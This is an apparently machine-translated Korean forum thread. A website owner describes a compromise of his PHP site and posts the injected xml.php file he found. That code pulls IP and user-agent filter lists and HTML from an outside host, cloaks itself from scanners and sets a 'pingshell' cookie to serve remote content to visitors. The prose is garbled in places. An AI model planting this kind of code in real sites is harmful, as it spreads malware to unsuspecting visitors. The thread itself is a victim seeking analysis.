편집 : 지금까지 좋은 작품.나는 방금 해킹 당했지만 얼마나 중요한지, 왜 그런지 모르겠습니다. 매우 이상한 코드 삽입
난 그냥이 존재 다운로드를 발견하고 내 bash는 역사에 실행 한:
(안전 볼)
감사에게 난 그냥했습니다 모든
을 내 사이트의 소스 PHP가 편집 된 것으로 나타났습니다. 나는 어떻게 (나는 나의 암호를 모두 바꿨다) 모르지만 정말로 나를 혼란스럽게하는 것은 이유 다.
몇 페이지에서 내 이미지 디렉토리 (HTACCESS가 액세스 할 수있는 유일한 디렉토리)에있는 xml.php 파일에 링크 된 iframe이 배치되었습니다.이 코드는 페이지가 상당히 복잡하므로 배치해야합니다 이러한 페이지를 제동없이 자동 장소가 거의 불가능했을 것이다.
이제 정말 혼란 것은 내가 아무것도하지 않습니다 볼 수있는 것과 같이,이 XML.php 파일의 내용이다.
여기 코드 :
<?php
$urlIps = "http://mp3magicmag.com/frame/ips.txt"; // Url to IP's
$urlHtml = "http://mp3magicmag.com/frame/html.code"; // Url to html.code
$urlUa = "http://mp3magicmag.com/frame/ua.txt"; // Url to User Agent file
if(isset($_GET['ping'])){
echo "Status: Ping successful!"; die;
}
$ip = $_SERVER['REMOTE_ADDR'];
//orezaem do deapozona
$exIps = explode(".", $ip);
$ip = $exIps[0].".".$exIps[1].".".$exIps[2];
$ips = file_get_contents($urlIps);
if(strpos(" ".$ips, $ip)){ // esli nashli IP v file to ostanavlivaem process..
die;
}
$arrUa = file($urlUa);
for($ua=0; $ua<count($arrUa); $ua++){
$userAgent = trim($arrUa[$ua]);
if(strpos(" ".$_SERVER['HTTP_USER_AGENT'], $userAgent)){ // esli nashli v User Agent'e to ostanavlivaem process..
die;
}
}
if(isset($_COOKIE['pingshell'])){ // proveriaem est' li kuki
echo @file_get_contents($urlHtml);
}else{
?>
<SCRIPT LANGUAGE="JavaScript">
function setCookie (name, value, expires, path, domain, secure) {
document.cookie = name + "=" + escape(value) +
((expires) ? "; expires=" + expires : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
}
</SCRIPT>
<SCRIPT LANGUAGE="JavaScript">
setCookie("pingshell", "12345", "Mon, 01-Jan-2099 00:00:00 GMT", "/");
</SCRIPT>
<meta http-equiv="refresh" content="2; url=">
<?php
}
?>
나는 뭔가를 놓치고 있습니까? 아니면 이상한 "해킹"입니까? 나는 내 인터넷 검색을했는데 전에 어떤 일이 벌어지고 있는지 찾을 수 없다.
당신은 무엇을 의미합니까, 그것은 아무것도하지 않는다? 이 코드는 어떤 일을하고,'file_get_contents'를 사용하여 페이지를 얻고, 물건을 출력합니다 (일부'echo'es와 심지어 쿠키를위한 js), 브라우저가 새로 고침을합니다 ... – cambraca
URL은 파일은 다음과 같습니다. 비어있는 좋은. – Jon
나는 그 코멘트가 무엇을 말하고 있는지 궁금하다. – Jonah